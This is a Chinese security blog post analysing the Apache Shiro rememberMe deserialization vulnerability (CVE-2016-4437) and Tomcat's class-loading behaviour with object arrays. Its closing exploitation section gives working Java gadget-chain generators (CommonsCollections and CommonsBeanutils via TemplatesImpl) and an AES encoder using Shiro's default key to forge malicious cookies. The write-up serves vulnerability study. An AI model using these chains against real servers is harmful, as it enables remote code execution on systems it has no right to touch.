从Tomcat类加载机制中真正理解shiro反序列化

2023-10-14 02:34:35

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

CVE-2016-4437/SHIRO-550
-----------------------

环境搭建
----

clone一下别的师傅的项目：https://github.com/phith0n/JavaThings/tree/master/shirodemo

以发现者的角度分析漏洞
-----------

首先在这个1day漏洞爆出来的时候，我们会从漏洞描述中知道这是个关于cookie的漏洞，这时候，我们就需要去找找看shiro中关于管理cookie的类，有个`CookieRememberMeManager`，进去看看。

![image](https://image.3001.net/images/20231014/1697220968_65298968bab1dfe8d4bea.png)

其中有两个方法：  
`rememberSerializedIdentity()`设置cookie

![image](https://image.3001.net/images/20231014/1697220986_6529897a6069c760b5261.png)

`getRememberedSerializedIdentity()`获取cookie

![image](https://image.3001.net/images/20231014/1697220996_6529898450b3cca3c6151.png)

我们先来看`getRememberedSerializedIdentity()`，先判断是否是ShiroHttpServletRequest，然后调用`cookie.readValue()`获取cookie中的值，进去看看具体是获取哪个值

![image](https://image.3001.net/images/20231014/1697221004_6529898cb2c870bfbbc05.png)

将name传入，获取的是key为name的值，而name是在构造函数中传入的，这时要追溯到创建`SimpleCookie`的时候，`SimpleCookie`是在设置cookie的时候创建的，具体就不追了很简单

![image](https://image.3001.net/images/20231014/1697221016_65298998aaaeebf8995fd.png)

调用了参数名为name的有参构造，将rememberMe字符串作为参数传了进去，所以`cookie.readValue()`获取的是cookie中的`rememberMe`的值，之后就对这个base64值解码并返回。

我们看看哪里调用了这个方法，发现`AbstractRememberMeManager#getRememberedPrincipals`调用了它

![image](https://image.3001.net/images/20231014/1697221030_652989a61cfa5693d24a0.png)

`getRememberedPrincipals`方法中首先调用`getRememberedSerializedIdentity`方法从cookie中返回`rememberMe`解码后的byte数组，传入`convertBytesToPrincipals`方法中

![image](https://image.3001.net/images/20231014/1697221038_652989ae6db221ed17558.png)

调用了`decrypt`解密，`deserialize`反序列化

![image](https://image.3001.net/images/20231014/1697221052_652989bc830ffb858f3f1.png)

看看`decrypt`方法的逻辑，先获取密钥服务，传入要加密的数组和密钥进行加密，重点关注一下这个密钥

![image](https://image.3001.net/images/20231014/1697221062_652989c65ec0f9d8c4d2c.png)

经过一些列的调用会发现获取到的值在构造方法中设置的一个常量

![image](https://image.3001.net/images/20231014/1697221070_652989cef18a274043151.png)

调用栈如下：

    org.apache.shiro.mgt.AbstractRememberMeManager#AbstractRememberMeManager
    org.apache.shiro.mgt.AbstractRememberMeManager#setCipherKey
    org.apache.shiro.mgt.AbstractRememberMeManager#setDecryptionCipherKey
    

AES解密后调用`deserialize`反序列化，其中序列化器是`DefaultSerializer`，导致反序列化漏洞存在

![image](https://image.3001.net/images/20231014/1697221091_652989e3a4c2902bd6201.png)  
![image](https://image.3001.net/images/20231014/1697221101_652989ed104310721d45d.png)

解密的逻辑追完后我们来看看加密的逻辑，看看哪个方法调用了`rememberSerializedIdentity()`

![image](https://image.3001.net/images/20231014/1697221111_652989f74870c4fc787a1.png)

其中调用了`convertPrincipalsToBytes`获取AES加密后的数据，之后调用`rememberSerializedIdentity()`base64后设置进cookie，跟进看看

![image](https://image.3001.net/images/20231014/1697221121_65298a010e62cace101ef.png)

调用`serialize`序列化数据，调用`encrypt`AES加密数据，解密过程正好相反

![image](https://image.3001.net/images/20231014/1697221131_65298a0bc1d5606749822.png)

总结一下：

加密：序列化-AES-base64  
解密：base64-AES-反序列化

无法反序列化Transformer\[\]探讨
-----------------------

> 具体可以看我完整分析Tomcat类加载器的文章

在制作exp的时候发现有个问题：`无法反序列化Transformer[]`

直接看源码：

shiro在反序列化的时候用的是自定义的`ObjectInputStream`

![image](https://image.3001.net/images/20231014/1697221152_65298a2043e164ba30c02.png)

这个`ClassResolvingObjectInputStream`重写了`resolveClass`，我们在`深入java反序列化`文章中分析过`readObject`的源码，重写`resolveClass`可以自定义要获取的Class对象

![image](https://image.3001.net/images/20231014/1697221164_65298a2c24070228048b9.png)

这里使用`ClassUtils.forName`来获取class对象目的就是让Tomcat的`WebAppClassLoader`去加载反序列化的类

![image](https://image.3001.net/images/20231014/1697221172_65298a348009294d3c2fd.png)

来到`WebappClassLoaderBase#loadClass(java.lang.String, boolean)`，首先调用`findLoadedClass0`,先从缓存中获取有无加载过的class

![image](https://image.3001.net/images/20231014/1697221182_65298a3eee27899fd652a.png)  
![image](https://image.3001.net/images/20231014/1697221198_65298a4e48657dc71fd6d.png)

判断有无开启双亲委派机制，有的话会先委派父加载器去加载

![image](https://image.3001.net/images/20231014/1697221209_65298a59037e893eee963.png)

使用WebApp类加载器去加载，其逻辑是扫描"WEB-INF/libs"和"WEB-INF/classes"目录下jar包中有无对应name的class类，有的话就返回，具体扫描的逻辑是用`jarFile`类实现的，有兴趣的师傅可以去跟下。

![image](https://image.3001.net/images/20231014/1697221247_65298a7f7958b3899e8ce.png)

这时我们的`[Lorg.apache.commons.collections.Transformer;`这个类名是肯定扫描不到的，而`org.apache.commons.collections.Transformer`类名是可以扫描到的

![image](https://image.3001.net/images/20231014/1697221256_65298a884966557ea1d58.png)

![image](https://image.3001.net/images/20231014/1697221459_65298b53f046274d47b1e.png)

后面判断没有开启双亲委派的话，会用`commonloader`去加载类，也就是`$CATALINE_HOME/lib`目录下的。

![image](https://image.3001.net/images/20231014/1697221473_65298b617d54fa0399cf3.png)

`[Lorg.apache.commons.collections.Transformer;`肯定是加载不到的，而`[Ljava.lang.StackTraceElement;`就可以加载到

![image](https://image.3001.net/images/20231014/1697221482_65298b6ad96c0e1dcf807.png)

![image](https://image.3001.net/images/20231014/1697221490_65298b72be6398ba36cbb.png)

最后所有加载器都加载不到的话，就抛出`ClassNotFoundException`的异常

![image](https://image.3001.net/images/20231014/1697221499_65298b7b26bdbdbac5e2e.png)

所以网上很多说加载不了数组的结论是错的，准确来说**可以加载共享库中的对象数组但不能加载自定义类和第三方类的对象数组**

漏洞利用
----

既然是反序列化那就要配合依赖去打，这里用CC链但有以下条件：

1.  无法使用`Transformer[]`
    
2.  4版本以下不能用`TransformingComparator`(因为3版本的没有实现`Serializable`)
    

附上其他师傅的链：

    // 改进版 CC11 EXP
    public class CC11BestEXP {
        public static void main(String[] args) throws Exception{
            byte[] code = Files.readAllBytes(Paths.get("ClassForCC2.class"));
            byte[][] codes = {code};
            TemplatesImpl templates = new TemplatesImpl();
            setFieldValue(templates, "_name", "aaaaa");
            setFieldValue(templates, "_bytecodes", codes);
            setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
            InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);
            HashMap<Object, Object> hashMap = new HashMap<>();
            Map<Object, Object> lazyMap = LazyMap.decorate(hashMap, new ConstantTransformer(1)); // 防止在反序列化前弹计算器
            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templates);
            HashMap<Object, Object> expMap = new HashMap<>();
            expMap.put(tiedMapEntry, "value");
            lazyMap.remove(templates);
            // 在 put 之后通过反射修改值
            setFieldValue(lazyMap, "factory", invokerTransformer);
    
            serialize(expMap);
            //    unserialize("ser.bin");
        }
    
        public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
            Field field = obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        }
    
        public static void serialize(Object obj) throws IOException {
            ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oos.writeObject(obj);
        }
        public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
            ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
            Object obj = ois.readObject();
            return obj;
        }
    }
    

CB链：

    public class CB1EXP {
        public static void main(String[] args) throws Exception{
            byte[] code = Files.readAllBytes(Paths.get("ClassForCC2.class"));
            TemplatesImpl templates = new TemplatesImpl();
            setFieldValue(templates, "_name", "Calc");
            setFieldValue(templates, "_bytecodes", new byte[][] {code});
            setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
            //    templates.newTransformer();
            final BeanComparator beanComparator = new BeanComparator();
            // 创建新的队列，并添加恶意字节码
            final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
            queue.add("1");
            queue.add("1");
    
            // 将 property 的值赋为 outputProperties
            setFieldValue(beanComparator, "property", "outputProperties");
            setFieldValue(queue, "queue", new Object[]{templates, templates});
            serialize(queue);
            //    unserialize("ser.bin");
        }
    
        public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
            Field field = obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        }
    
        public static void serialize(Object obj) throws IOException {
            ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oos.writeObject(obj);
        }
        public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
            ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
            Object obj = ois.readObject();
            return obj;
        }
    }
    

AES加密工具：

    public class AESEncode {
        public static void main(String[] args) throws Exception {
    //        String path = "./ser.bin";
    //        String path = "./CC6WithHashMap.bin";
    //        String path = "./stackTest.bin";
            String path = "./tranTest.bin";
            byte[] key = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
            AesCipherService aes = new AesCipherService();
            ByteSource ciphertext = aes.encrypt(getBytes(path), key);
            System.out.printf(ciphertext.toString());
        }
    
    
        public static byte[] getBytes(String path) throws Exception{
            InputStream inputStream = new FileInputStream(path);
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            int n = 0;
            while ((n=inputStream.read())!=-1){
                byteArrayOutputStream.write(n);
            }
            byte[] bytes = byteArrayOutputStream.toByteArray();
            return bytes;
    
        }
    }
    

\# web安全 \# 漏洞分析 \# shiro反序列化漏洞 \# JAVA安全